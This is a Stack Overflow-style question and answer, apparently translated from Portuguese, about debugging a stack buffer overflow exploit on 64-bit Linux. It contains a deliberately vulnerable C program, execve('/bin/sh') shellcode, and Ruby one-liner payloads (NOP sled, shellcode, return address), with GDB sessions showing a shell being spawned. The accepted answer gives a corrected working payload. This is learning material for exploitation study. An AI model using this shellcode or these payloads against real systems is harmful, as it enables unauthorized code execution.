Syscall inside shellcode won't run

Question

Note: I've already asked this question on Stack Overflow in Portuguese: https://pt.stackoverflow.com/questions/76571/seguran%C3%A7a-syscall-dentro-de-shellcode-n%C3%A3o-executa. It seems to be a really hard question, so this post is a translation of the Portuguese one.

I'm studying Information Security and performing some experiments trying to exploit a classic case of buffer overflow.

I've succeeded in creating the shellcode, injecting it into the vulnerable program, and executing it. My problem is that the execve() syscall that should give me a shell does not work.

In more detail:

This is the code of the vulnerable program (compiled on Ubuntu 15.04 x86-64 with the gcc flags "-fno-stack-protector -z execstack -g" and with ASLR turned off):

#include<stdio.h>
#include<stdlib.h>
#include<string.h>

int do_bof(char *exploit) {
    char buf[128];

    strcpy(buf, exploit);
    return 1;
}

int main(int argc, char *argv[]) {
    if(argc < 2) {
        puts("Usage: bof <any>");
        return 0;
    }

    do_bof(argv[1]);
    puts("Failed to exploit.");
    return 0;
}

This is a small assembly program that spawns a shell and then exits. Note that this code works on its own: if I assemble, link, and run it alone, it works.

global _start

section .text
_start:
    jmp short push_shell
starter:
    pop rdi
    mov al, 59
    xor rsi, rsi
    xor rdx, rdx
    xor rcx, rcx
    syscall
    xor al, al
    mov BYTE [rdi], al
    mov al, 60
    syscall
push_shell:
    call starter
shell:
    db  "/bin/sh"

This is the output of objdump -d -M intel for the program above, from which the shellcode was extracted:

spawn_shell.o: file format elf64-x86-64

Disassembly of section .text:

0000000000000000 <_start>:
   0:   eb 16                   jmp    18 <push_shell>

0000000000000002 <starter>:
   2:   5f                      pop    rdi
   3:   b0 3b                   mov    al,0x3b
   5:   48 31 f6                xor    rsi,rsi
   8:   48 31 d2                xor    rdx,rdx
   b:   48 31 c9                xor    rcx,rcx
   e:   0f 05                   syscall 
  10:   30 c0                   xor    al,al
  12:   88 07                   mov    BYTE PTR [rdi],al
  14:   b0 3c                   mov    al,0x3c
  16:   0f 05                   syscall 

0000000000000018 <push_shell>:
  18:   e8 e5 ff ff ff          call   2 <starter>

000000000000001d <shell>:
  1d:   2f                      (bad)  
  1e:   62                      (bad)  
  1f:   69                      .byte 0x69
  20:   6e                      outs   dx,BYTE PTR ds:[rsi]
  21:   2f                      (bad)  
  22:   73 68                   jae    8c <shell+0x6f>

This command produces the payload, which injects the shellcode along with the needed NOP sled and the return address that overwrites the original return address:

ruby -e 'print "\x90" * 103 + "\xeb\x13\x5f\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\x30\xc0\x88\x07\xb0\x3c\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\xd0\xd8\xff\xff\xff\x7f"'
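The sizes in this payload can be checked with a short Ruby sketch. It assumes the return address sits 136 bytes past the start of buf (128 bytes of buffer plus 8 bytes of saved RBP), a figure inferred from 103 NOPs + 33 shellcode bytes rather than stated anywhere in the question. The names build_payload, OFFSET_TO_RET and RET_ADDR are made up for this illustration.

```ruby
# Shellcode bytes copied from the payload above (26 bytes of code + "/bin/sh").
SHELLCODE = ("\xeb\x13\x5f\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05" \
             "\x30\xc0\x88\x07\xb0\x3c\x0f\x05\xe8\xe8\xff\xff\xff" \
             "\x2f\x62\x69\x6e\x2f\x73\x68").b

# Assumption: 128-byte buffer + 8-byte saved RBP lie before the return address.
OFFSET_TO_RET = 128 + 8
# Return address used in the question's payload.
RET_ADDR = 0x7fffffffd8d0

def build_payload(shellcode, offset_to_ret, ret_addr)
  nop_count = offset_to_ret - shellcode.bytesize
  raise ArgumentError, "shellcode does not fit before the return address" if nop_count < 0

  # Little-endian 64-bit address, cut to its 6 low bytes: the two high
  # bytes are 0x00, and strcpy would stop copying at the first of them.
  ret_bytes = [ret_addr].pack("Q<")[0, 6]
  ("\x90".b * nop_count) + shellcode + ret_bytes
end

payload = build_payload(SHELLCODE, OFFSET_TO_RET, RET_ADDR)
puts "shellcode: #{SHELLCODE.bytesize} bytes"
puts "NOP sled:  #{OFFSET_TO_RET - SHELLCODE.bytesize} bytes"
puts "payload:   #{payload.bytesize} bytes"
```

Whenever the shellcode grows or shrinks, the NOP count has to change by the same amount so that the return address still lands at the same offset.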

So far, I've debugged the program with the shellcode injected very carefully, watching the RIP register to see where execution goes wrong. I've discovered that:

The return address is correctly overwritten and execution jumps to my shellcode.
Execution goes fine until the "e:" line of my assembly program, where the execve() syscall happens.
The syscall simply does not work, even with the registers correctly set up for it. Strangely, after this line, all bits of the RAX and RCX registers are set.

The result is that execution reaches the unconditional call that pushes the address of the shell string again, and an infinite loop starts until the program crashes with a SEGFAULT.

That's the main problem: the syscall won't work.

Some notes:

Some would say that my "/bin/sh" string needs to be null terminated. That does not seem to be necessary: nasm seems to add a null byte implicitly, and my assembly program works, as I stated.
Remember that this is 64-bit shellcode.

This shellcode works in the following code:

char shellcode[] = "\xeb\x0b\x5f\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

int main() {
    void (*func)();
    func = (void (*)()) shellcode;
    (void)(func)();
}

What's wrong with my shellcode?

EDIT 1:

Thanks to Jester's answer, the first problem was solved. Additionally, I discovered that shellcode is not required to work on its own. The new assembly code for the shellcode is:

spawn_shell: file format elf64-x86-64


Disassembly of section .text:

0000000000400080 <_start>:
  400080:   eb 1e                   jmp    4000a0 <push_shell>

0000000000400082 <starter>:
  400082:   5f                      pop    %rdi
  400083:   48 31 c0                xor    %rax,%rax
  400086:   88 47 07                mov    %al,0x7(%rdi)
  400089:   b0 3b                   mov    $0x3b,%al
  40008b:   48 31 f6                xor    %rsi,%rsi
  40008e:   48 31 d2                xor    %rdx,%rdx
  400091:   48 31 c9                xor    %rcx,%rcx
  400094:   0f 05                   syscall 
  400096:   48 31 c0                xor    %rax,%rax
  400099:   48 31 ff                xor    %rdi,%rdi
  40009c:   b0 3c                   mov    $0x3c,%al
  40009e:   0f 05                   syscall 

00000000004000a0 <push_shell>:
  4000a0:   e8 dd ff ff ff          callq  400082 <starter>
  4000a5:   2f                      (bad)  
  4000a6:   62                      (bad)  
  4000a7:   69                      .byte 0x69
  4000a8:   6e                      outsb  %ds:(%rsi),(%dx)
  4000a9:   2f                      (bad)  
  4000aa:   73 68                   jae    400114 <push_shell+0x74>

If I assemble and link it, it will not work, but if I inject it into another program as a payload, it will! Why? Because if I run this program alone, it tries to terminate an already NULL-terminated "/bin/sh" string. The OS seems to do some initial setup even for assembly programs. That is not the case when I inject the shellcode. Moreover, the real reason my syscall did not succeed is that the "/bin/sh" string was not NULL terminated at runtime; it worked as a standalone program because in that case it was NULL terminated.

Therefore, the fact that your shellcode runs fine as a standalone program is not proof that it works when injected.
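The effect of the missing terminator can be sketched in Ruby by treating the copied payload as memory and reading the path the way execve() would, up to the first 0 byte. The bytes are the ones from the first attempt. The helper c_string_at and the constant FIRST_ATTEMPT_MEMORY are invented for this illustration, and the single trailing 0 byte stands for the terminator that strcpy appends.

```ruby
# Memory as left by strcpy in the first attempt:
# NOP sled, shellcode ending in "/bin/sh", return address, strcpy's terminator.
FIRST_ATTEMPT_MEMORY = (
  ("\x90".b * 103) +
  ("\xeb\x13\x5f\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05" \
   "\x30\xc0\x88\x07\xb0\x3c\x0f\x05\xe8\xe8\xff\xff\xff" \
   "\x2f\x62\x69\x6e\x2f\x73\x68").b +
  "\xd0\xd8\xff\xff\xff\x7f".b +
  "\x00".b
)

# Read a C string: every byte from offset up to (not including) the first 0.
def c_string_at(memory, offset)
  terminator = memory.index("\x00".b, offset)
  raise ArgumentError, "no terminator found" if terminator.nil?
  memory.byteslice(offset, terminator - offset)
end

path_offset = FIRST_ATTEMPT_MEMORY.index("/bin/sh".b)

# Without a runtime terminator the path runs on into the return address.
puts c_string_at(FIRST_ATTEMPT_MEMORY, path_offset).inspect

# Storing a 0 byte at path + 7, as mov %al,0x7(%rdi) does, ends the string.
patched = FIRST_ATTEMPT_MEMORY.dup
patched.setbyte(path_offset + 7, 0)
puts c_string_at(patched, path_offset).inspect
```

In the unpatched case the kernel is asked to execute a file whose name is "/bin/sh" followed by six address bytes, which is why the call fails even though the registers look right.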

The exploitation was successful... at least in GDB. Now I have a new problem: the exploit works inside GDB, but not outside it.

$ gdb -q bof3
Reading symbols from bof3...done.
(gdb) r (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
Starting program: /home/sidao/h4x0r/C-CPP-Projects/security/bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
process 13952 is executing new program: /bin/dash
$ ls
bof    bof2.c  bof3_env      bof3_new_shellcode.txt bof3_shellcode.txt  get_shell     shellcode_exit    shellcode_hello.c  shellcode_shell2
bof.c  bof3    bof3_env.c    bof3_non_dbg        func_stack      get_shell.c      shellcode_exit.c  shellcode_shell    shellcode_shell2.c
bof2   bof3.c  bof3_gdb_env  bof3_run_env        func_stack.c    shellcode_bof.c  shellcode_hello   shellcode_shell.c
$ exit
[Inferior 1 (process 13952) exited normally]
(gdb)

And outside:

$ ./bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
fish: Job 1, “./bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')” terminated by signal SIGSEGV (Address boundary error)

I immediately searched for this and found the question "Buffer overflow works in gdb but not without it".

Initially I thought it was just a matter of unsetting two environment variables and finding a new return address, but unsetting the two variables did not make the slightest difference:

$ gdb -q bof3
Reading symbols from bof3...done.
(gdb) unset env COLUMNS
(gdb) unset env LINES
(gdb) r (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
Starting program: /home/sidao/h4x0r/C-CPP-Projects/security/bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
process 14670 is executing new program: /bin/dash
$

So now, this is the second question: why does the exploit work inside GDB but not outside it?

At a guess `strcpy` only copies to the first 0 byte. So if the exploit contains any 0s then you're only copying the part of the exploit before the first 0. — John3136, Jul 28 '15 at 00:12
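That guess can be checked mechanically. The following Ruby sketch scans a byte string for 0 bytes. The helper first_nul_offset and the constant names are invented here, and the bytes are the shellcode and return address from the question's first payload.

```ruby
# Offset of the first 0 byte in the given bytes, or nil when there is none.
def first_nul_offset(bytes)
  bytes.b.index("\x00".b)
end

# Shellcode from the question's first payload.
QUESTION_SHELLCODE = ("\xeb\x13\x5f\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05" \
                      "\x30\xc0\x88\x07\xb0\x3c\x0f\x05\xe8\xe8\xff\xff\xff" \
                      "\x2f\x62\x69\x6e\x2f\x73\x68").b

# The same return address written out as a full 8-byte little-endian value.
FULL_RETURN_ADDRESS = [0x7fffffffd8d0].pack("Q<")

puts first_nul_offset(QUESTION_SHELLCODE).inspect   # nil: strcpy copies all of it
puts first_nul_offset(FULL_RETURN_ADDRESS).inspect  # 6: the two high bytes are zero
```

The shellcode itself contains no 0 bytes, so strcpy copies it in full. Only the two high bytes of the address are zero, which is why the payload appends just the six low bytes.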

score 3 · Accepted Answer · answered Jul 28 '15 at 00:45

The problem is the mov al,0x3b. You forgot to zero the top bits, so if they are not zero already, you will not be performing an execve syscall but something else. Simple debugging should have pointed this out to you. The solution is trivial: just insert xor eax, eax before that. Furthermore, since you append the return address to your exploit, the string will no longer be zero terminated. It's also easy to fix, by storing a zero there at runtime using for example mov [rdi + 7], al just after you have cleared eax.
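The effect of writing only AL can be sketched by modelling RAX as a 64-bit integer in Ruby. The helpers mov_al and xor_eax_eax are names invented here, and the starting value 0xfffffffffffffffe (-2, ENOENT) is only an assumed example of what a failed execve could leave in RAX.

```ruby
MASK64 = 0xffff_ffff_ffff_ffff

# mov al, imm8: replaces bits 0..7 of RAX and leaves bits 8..63 untouched.
def mov_al(rax, imm8)
  (rax & (MASK64 ^ 0xff)) | (imm8 & 0xff)
end

# xor eax, eax: a write to a 32-bit register zero-extends, so all of RAX is 0.
def xor_eax_eax(_rax)
  0
end

# Assumed example: RAX holds a negative errno after a failed syscall.
rax_after_failure = 0xffff_ffff_ffff_fffe

# The original shellcode does xor al, al / mov al, 60 at this point.
without_clear = mov_al(mov_al(rax_after_failure, 0), 60)
with_clear    = mov_al(xor_eax_eax(rax_after_failure), 60)

puts format("without xor eax, eax: %#018x", without_clear)
puts format("with xor eax, eax:    %#018x", with_clear)
```

With the upper bits still set, the kernel sees a syscall number that does not exist, so neither execve nor exit runs and execution falls through to the next instruction.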

The full exploit could look like:

ruby -e 'print "\x90" * 98 + "\xeb\x18\x5f\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\x30\xc0\x88\x07\xb0\x3c\x0f\x05\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\xd0\xd8\xff\xff\xff\x7f"'

The initial part corresponds to:

    jmp short push_shell
starter:
    pop rdi
    xor eax, eax
    mov [rdi + 7], al
    mov al, 59

Note that due to the code size change, the offset for the jmp and the call at the end had to be changed as well, and the number of nop instructions too.
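The offset arithmetic can be sketched in Ruby. A relative jmp or call stores the distance from the end of the instruction to its target, so inserting bytes between the two changes the encoded value. The helper names are invented for this illustration. The first pair of offsets comes from the objdump listing in the question, and the second pair is obtained by counting bytes in the payload above.

```ruby
# Displacement of a relative branch: target minus the address of the
# instruction that follows the branch.
def rel_displacement(insn_offset, insn_length, target_offset)
  target_offset - (insn_offset + insn_length)
end

# jmp short: opcode 0xeb followed by a signed 8-bit displacement.
def encode_jmp_short(insn_offset, target_offset)
  disp = rel_displacement(insn_offset, 2, target_offset)
  raise RangeError, "target out of rel8 range" unless (-128..127).cover?(disp)
  [0xeb, disp & 0xff]
end

# call rel32: opcode 0xe8 followed by a signed 32-bit little-endian displacement.
def encode_call_rel32(insn_offset, target_offset)
  disp = rel_displacement(insn_offset, 5, target_offset)
  [0xe8] + [disp].pack("l<").bytes
end

def hex(bytes)
  bytes.map { |b| format("%02x", b) }.join(" ")
end

# Layout from the question's objdump: push_shell at 0x18, starter at 0x02.
puts hex(encode_jmp_short(0x00, 0x18))   # eb 16
puts hex(encode_call_rel32(0x18, 0x02))  # e8 e5 ff ff ff

# Layout of the payload above: five bytes inserted, so the call moves to 0x1a.
puts hex(encode_jmp_short(0x00, 0x1a))   # eb 18
puts hex(encode_call_rel32(0x1a, 0x02))  # e8 e3 ff ff ff
```

Letting the assembler recompute these values by reassembling the source avoids patching the bytes by hand.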

The above code (with the return address adjusted for my system) works fine here.

Ok, ok... Your shellcode worked, and I reworked mine so that it works too. However, an even stranger problem arose: the exploit works inside GDB, but not when the program runs standalone. =D — Sid, Jul 28 '15 at 02:43
Slightly different memory layout when standalone. If you use the correct address it works in standalone too. — Jester, Jul 28 '15 at 10:10
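Why a slightly different layout is enough to break the exploit can be sketched as a range check in Ruby: the overwritten return address has to point into the NOP sled or at the first shellcode byte. The two buffer addresses below are hypothetical values chosen for illustration, not measurements. Only the 92-byte sled and the return address 0x7fffffffd870 come from the question, and lands_in_sled? is a name invented here.

```ruby
SLED_LENGTH = 92                 # NOP count of the second payload
GUESSED_RET = 0x7fffffffd870     # return address used in the second payload

# True when ret_addr points at a NOP or at the first byte of the shellcode.
def lands_in_sled?(ret_addr, buf_addr, sled_length)
  (buf_addr..buf_addr + sled_length).cover?(ret_addr)
end

# Hypothetical buffer addresses, for illustration only.
buf_under_gdb  = 0x7fffffffd850
buf_standalone = 0x7fffffffd8b0

puts lands_in_sled?(GUESSED_RET, buf_under_gdb, SLED_LENGTH)
puts lands_in_sled?(GUESSED_RET, buf_standalone, SLED_LENGTH)
```

Under these assumed addresses the guess hits the sled in the first case and misses it in the second, so the return address has to be determined for the environment in which the program actually runs.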
